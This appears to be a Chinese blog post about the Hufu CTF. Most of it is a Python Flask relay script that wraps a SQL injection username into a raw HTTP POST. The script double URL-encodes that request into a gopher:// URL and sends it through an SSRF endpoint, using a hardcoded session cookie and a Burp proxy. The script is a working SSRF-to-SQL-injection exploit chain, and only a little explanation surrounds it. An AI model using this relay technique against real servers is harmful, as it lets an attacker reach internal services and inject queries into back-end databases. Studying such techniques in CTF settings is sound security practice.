以本次虎符CTF为例,我们在进行常规SQL注入的时候,会遇到这几种情况
①常常会因为构造网络请求麻烦
②写tamper嫌麻烦
这时候我们的中转注入就来了,这次的虎符CTF比赛当中有一个Web题需要我们频繁构造gopher去实现POST或者GET请求,这时候如果我们想要实现更自由的SQL注入,便可使用,下面直接放上脚本,请自行理解,一点不难
from flask import Flask,request
from urllib.parse import quote
import requests
def urlencode(s):
res=''
for c in s:
fuck=hex(ord(c)).split('0x')[1]
if len(fuck)==1:
fuck='0'+fuck
res+="%"+fuck
return res
fuckhtml='''POST /admin.php HTTP/1.1
Host: 127.0.0.1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: {length}
username={username}&password=129581926211651571912466741651878684928'''.replace("\n","\r\n")
tmpPayload= fuckhtml.split("\r\n")[-1]
tmplength = len(tmpPayload) - len('{username}')
url="http://eci-2zehhuwx9m3o88h32zup.cloudeci1.ichunqiu.com/ssrf.php?way=gopher%3A%2F%2F127.0.0.1:80%2F_"
app = Flask(__name__)
@app.route('/')
def hello_world():
username=request.args.get('username')
shit=fuckhtml.format(username=username,length=str(tmplength+len(username)))
cookies={'PHPSESSID':'qitbcj1puicm4qcpf8oe1fgc17'}
page=requests.get(url+urlencode(urlencode(shit)),proxies={'http':'http://127.0.0.1:8081'},cookies=cookies).text
return page
if __name__ == '__main__':
app.run()
当然我们可以去掉proxies参数,我这里加上只是为了和burpsuite实现联动
扫一扫
427
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
